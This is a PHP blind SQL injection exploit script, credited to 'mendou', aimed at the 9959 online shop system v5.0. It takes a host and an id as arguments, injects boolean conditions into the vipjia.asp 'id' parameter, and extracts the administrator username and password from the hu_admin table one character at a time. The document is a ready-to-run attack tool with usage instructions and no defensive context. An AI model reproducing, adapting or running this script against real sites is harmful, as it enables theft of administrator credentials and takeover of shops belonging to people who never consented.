<?php
print_r('
+---------------------------------------------------------------------------+
 9959网店系统 v5.0 Blind SQL injection exploit by mendou
 官方网站：<a href="http://www.9959shop.com" target="_blank">www.9959shop.com</a>
+---------------------------------------------------------------------------+
');

if ($argc < 2) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host id
Example:
php '.$argv[0].' localhost  id
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(0);
ini_set('max_execution_time', 0);
$host = $argv[1];
$str = "abcdefghijklmnopqrstuvwxyz0123456789";
$strlen =strlen($str);
$pid = $argv[2];

$n_len = lenstr(adminname); //用户长度
echo "用户长度:".$n_len."\r\n";
pojie("adminname",$n_len);echo "\r\n";
$p_len = lenstr(password); //密码长度
echo "密码长度:".$p_len."\r\n";
pojie("password",$p_len);

function pojie($str1,$len){
        global $host,$strlen,$str,$pid;
        for ($j=1 ; $j<=$len ; $j++){
                for ($i=0 ; $i<$strlen ; $i++){
                        $exp =  "%20and%20(select%20top%201%20mid(".$str1.",".$j.",1)%20from%20hu_admin)='".$str[$i]."'";
                        $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
                        if (strpos($a,"次")==true){
                                echo $str[$i];break;
                        }
                }
        }
}

//判断 用户或者密码的长度函数
function lenstr($str){
        global $host,$pid;
        for ($i=1 ; $i <= 30; $i++){
                $exp =  "%20and%20(select%20top%201%20len(".$str.")%20from%20hu_admin)=".$i;
                $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
                if (strpos($a,"次")==true){
                        return $i;
                }
        }
}

?>